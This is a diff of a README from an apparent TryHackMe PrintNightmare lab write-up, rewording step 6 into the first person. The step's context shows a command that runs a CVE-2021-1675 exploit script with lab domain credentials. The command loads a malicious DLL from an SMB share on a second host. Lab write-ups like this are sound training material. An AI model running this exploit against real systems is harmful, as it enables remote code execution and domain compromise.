trixiahorner/printnightmare-try-hack-me/README.md

 <br>
 <br>
-6. Now, everything is set up, you are ready to run the malicious script.
-Remember that this is a post-compromise attack, so we have domain controller and domain name, and we have username and password.
-And then we also have the path to the share file.
+6. Now, everything is set up, I am ready to run the malicious script.
+Remember that this is a post-compromise attack, so I have domain controller and domain name, and I already have username and password.
+And then I also have the path to the share file.

 ```
 python3.9 CVE-2021-1675.py Finance-01.THMdepartment.local/sjohnston:mindheartbeauty76@10.10.103.215 '\\10.10.217.212\share\malicious.dll'